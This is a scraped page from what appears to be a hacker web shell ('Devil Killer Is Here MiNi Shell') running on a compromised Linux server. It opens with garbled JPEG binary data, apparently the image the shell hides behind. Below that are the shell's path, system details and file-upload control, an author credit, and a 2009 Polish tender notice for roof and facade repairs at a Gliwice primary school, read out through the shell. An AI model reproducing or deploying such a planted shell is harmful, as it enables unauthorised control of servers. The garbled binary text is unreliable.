JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090529/172494-N-2009.html

<p class="kh_header"><b>Gliwice: Wymiana pokrycia dachowego i czyszczenie elewacji w Szkole Podstawowej nr 9 przy ulicy Sobieskiego.</b><br>
<b>Numer ogłoszenia: 172494 - 2009; data zamieszczenia: 29.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 9 , ul. Sobieskiego 14, 44-100 Gliwice, woj. śląskie, tel. 032 2391362, faks 032 2391362.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana pokrycia dachowego i czyszczenie elewacji w Szkole Podstawowej nr 9 przy ulicy Sobieskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy: 
Remontu  dachu i elewacji budynku szkoły.

Zakres prac:
-	rozbiórka pokrycia dachowego z dachówki karpiówki podwójnie w koronkę (100% wymiana) 
-	wykonanie zabezpieczeń ( daszki ochronne, rusztowania fasadowe, plandeki ochronne na całej płaszczyźnie rusztowania, montaż łapaczy)
-	wykonanie prac konserwatorskich elewacyjnych zgodnie z technologią
-	wykonanie rusztowań przy kominach
-	przemurowanie kominów
-	demontaż pokrycia dachowego wraz z obróbkami
-	demontaż łat
-	wymiana skorodowanych fragmentów więźby dachowej
-	założenie folii paro przepuszczalnej
-	konserwacja wieżyczek
-	obrobienie okienek dachowych
-	montaż pokrycia dachowego(kontr łaty , łaty obróbki ,dachówka ceramiczna karpiówka, wymiana rynien oraz rur spustowych, montaż płotków przeciwśniegowych systemowych
-	wymiana instalacji odgromowej
-	demontaż i ponowny montaż urządzeń zainstalowanych na elewacji i dachu budynku szkoły, w porozumieniu z właścicielami tych urządzeń(między innymi siec telefonii komórkowej)
-	opracowanie: projektu organizacji robót i planu bioz
-	opracowanie dokumentacji powykonawczej
-	wszelkie prace pomocnicze związane z robotami remontowymi, jak np. wygrodzenie terenu robót, daszki zabezpieczające, i inne
-	wywóz i utylizacja odpadów
-	uzyskanie zgody na wejście na teren posesji przy ulicy Sobieskiego 12 w związku z koniecznością wykonania robót (parcela nr 298)
-	przestrzeganie postanowień pozwolenia na budowę nr  AB-7353/88/ 2009 z dnia 27.01.2009r.
-	zapewnienie całodobowej ochrony i stróżowania terenu robót

Powierzchnia dachu: około 1950 m2 
Powierzchnia elewacji: około 3520 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.10.00-4, 45.31.00.00-3, 45.45.31.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 60 000,00 zł.(sześćdziesiąt tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki przystąpienia do postępowania:
1.1.	 Warunki przystąpienia do postępowania i wymagane dokumenty 
1.1.1. 	Posiadanie uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2 ustawy pzp). 
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej muszą spełniać wszystkie podmioty działające wspólnie, warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów występujących wspólnie, 
1.1.1.1. W celu potwierdzenia, warunku(ów) określonego(ych) w pkt 1.1.1. - należy złożyć: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników; 
b)	aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.1.2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
-	kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego,
b)	Doświadczenie zawodowe: 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością co najmniej:
- jedna robota budowlana polegająca na remoncie dachów obiektów zabytkowych lub objętych 
ochroną konserwatorską, o wartości nie mniejszej niż 1 000 000,00 zł (brutto) 
- jedna robota budowlana polegająca na remoncie, czyszczeniu  elewacji  obiektów zabytkowych lub objętych ochroną konserwatorską, o wartości nie mniejszej niż 1 000 000,00 zł (brutto) 
W przypadku podmiotów działających wspólnie potencjał techniczny i osoby zdolne do  wykonania zamówienia podlegają sumowaniu, tak aby łącznie podmioty spełniały powyższe warunki.
1.1.2.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.2 należy złożyć: 
a)	dokumenty stwierdzające, że kierownik robót, który będzie wykonywać przedmiot zamówienia posiada wymagane uprawnienia budowlane oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego z uwzględnieniem wymogów wg pkt 1.1.2.a.. 
b)	wykaz (na zał. nr 3 do SIWZ lub dokumencie zgodnym z treścią załącznika) osób które będą uczestniczyć w wykonywaniu zamówienia. 
c)	wykaz (na zał. nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (np. referencji) potwierdzających, że roboty te zostały wykonane należycie z uwzględnieniem wymogów wg pkt 1.1.2.b. 
1.1.3.  Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
Wykonawca winien mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji zamówienia.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu 
1.1.3.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.3 należy złożyć: 
oświadczenie na załączniku nr 2
1.1.4. W celu potwierdzenia warunków określonych w pkt 1.1.1, 1.1.2, 1.1.3 należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści ZAŁĄCZNIKA NR 2, załączonego do niniejszej specyfikacji; 
1.2. 	Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Polski 
1.2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Polski, zamiast: 
-	aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
-	aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 1.2.1., składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
1.3. Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania 
1.3.1. Ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w  pkt 1.  na zasadzie spełniania/nie spełnia. 
1.3.2. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki wymienione w pkt 1.  
UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez Zamawiającego, spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty nie spełniające wymogów, traktuje się jako nie złożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3 ustawy pzp. 
2.	Pozostałe dokumenty i oświadczenia, jakie musi zawierać oferta
2.1. 	Wykonawcy (w tym spółka cywilna) mogą wspólnie ubiegać się  udzielenie zamówienia z następującym zastrzeżeniem: 
2.1.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym spółka cywilna) muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu (lub reprezentowania w postępowaniu i zawarcia umowy). Stosowne pełnomocnictwo należy załączyć do oferty w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.

2.1.2. Pełnomocnictwo, o którym mowa w pkt 2.1.1. musi precyzować zakres umocowania i wskazywać pełnomocnika. Musi też wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie i każdy z nich musi podpisać się pod tym dokumentem.  
2.2. Wypełniony i podpisany druk oferty - ZAŁĄCZNIK NR 1 do niniejszej specyfikacji. 
2.3. Wykaz podwykonawców którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat zakresu wykonywanych przez nich czynności na załączniku Nr 6. (jeśli dotyczy)
2.4. Podpisany kosztorys ofertowy szczegółowy
2.5. Dowód wniesienia wadium
2.6. Potwierdzenie przeprowadzenia wizji terenu robót (załącznik nr 7). 

Inne wymagania: 
a)	przy przygotowaniu oferty i realizacji robót należy uwzględnić specyfikę pracy w czynnych obiektach oświatowych. 
b)	przed opracowaniem i złożeniem oferty Wykonawca zobowiązany jest przeprowadzić wizję terenu robót. Potwierdzenie przeprowadzenia takiej wizji należy załączyć do oferty(załącznik nr 7).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Warunki przystąpienia do postępowania:
1.1.	 Warunki przystąpienia do postępowania i wymagane dokumenty 
1.1.1. 	Posiadanie uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2 ustawy pzp). 
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej muszą spełniać wszystkie podmioty działające wspólnie, warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów występujących wspólnie, 
1.1.1.1. W celu potwierdzenia, warunku(ów) określonego(ych) w pkt 1.1.1. - należy złożyć: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników; 
b)	aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.1.2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
-	kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego,
b)	Doświadczenie zawodowe: 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością co najmniej:
- jedna robota budowlana polegająca na remoncie dachów obiektów zabytkowych lub objętych 
ochroną konserwatorską, o wartości nie mniejszej niż 1 000 000,00 zł (brutto) 
- jedna robota budowlana polegająca na remoncie, czyszczeniu  elewacji  obiektów zabytkowych lub objętych ochroną konserwatorską, o wartości nie mniejszej niż 1 000 000,00 zł (brutto) 
W przypadku podmiotów działających wspólnie potencjał techniczny i osoby zdolne do  wykonania zamówienia podlegają sumowaniu, tak aby łącznie podmioty spełniały powyższe warunki.
1.1.2.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.2 należy złożyć: 
a)	dokumenty stwierdzające, że kierownik robót, który będzie wykonywać przedmiot zamówienia posiada wymagane uprawnienia budowlane oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego z uwzględnieniem wymogów wg pkt 1.1.2.a.. 
b)	wykaz (na zał. nr 3 do SIWZ lub dokumencie zgodnym z treścią załącznika) osób które będą uczestniczyć w wykonywaniu zamówienia. 
c)	wykaz (na zał. nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (np. referencji) potwierdzających, że roboty te zostały wykonane należycie z uwzględnieniem wymogów wg pkt 1.1.2.b. 
1.1.3.  Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
Wykonawca winien mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji zamówienia.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu 
1.1.3.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.3 należy złożyć: 
oświadczenie na załączniku nr 2
1.1.4. W celu potwierdzenia warunków określonych w pkt 1.1.1, 1.1.2, 1.1.3 należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści ZAŁĄCZNIKA NR 2, załączonego do niniejszej specyfikacji; 
1.2. 	Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Polski 
1.2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Polski, zamiast: 
-	aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
-	aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 1.2.1., składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
1.3. Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania 
1.3.1. Ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w  pkt 1.  na zasadzie spełniania/nie spełnia. 
1.3.2. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki wymienione w pkt 1.  
UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez Zamawiającego, spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty nie spełniające wymogów, traktuje się jako nie złożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3 ustawy pzp. 
2.	Pozostałe dokumenty i oświadczenia, jakie musi zawierać oferta
2.1. 	Wykonawcy (w tym spółka cywilna) mogą wspólnie ubiegać się  udzielenie zamówienia z następującym zastrzeżeniem: 
2.1.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym spółka cywilna) muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu (lub reprezentowania w postępowaniu i zawarcia umowy). Stosowne pełnomocnictwo należy załączyć do oferty w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.

2.1.2. Pełnomocnictwo, o którym mowa w pkt 2.1.1. musi precyzować zakres umocowania i wskazywać pełnomocnika. Musi też wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie i każdy z nich musi podpisać się pod tym dokumentem.  
2.2. Wypełniony i podpisany druk oferty - ZAŁĄCZNIK NR 1 do niniejszej specyfikacji. 
2.3. Wykaz podwykonawców którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat zakresu wykonywanych przez nich czynności na załączniku Nr 6. (jeśli dotyczy)
2.4. Podpisany kosztorys ofertowy szczegółowy
2.5. Dowód wniesienia wadium
2.6. Potwierdzenie przeprowadzenia wizji terenu robót (załącznik nr 7). 

Inne wymagania: 
a)	przy przygotowaniu oferty i realizacji robót należy uwzględnić specyfikę pracy w czynnych obiektach oświatowych. 
b)	przed opracowaniem i złożeniem oferty Wykonawca zobowiązany jest przeprowadzić wizję terenu robót. Potwierdzenie przeprowadzenia takiej wizji należy załączyć do oferty(załącznik nr 7).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 9, Gliwice,  ul. Sobieskiego 14
telefon (0-32) 239-13-62; faks (0-32) 239-13-62.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2009 godzina 12:00, miejsce: Szkoła Podstawowa Nr 9, Gliwice,  ul. Sobieskiego 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com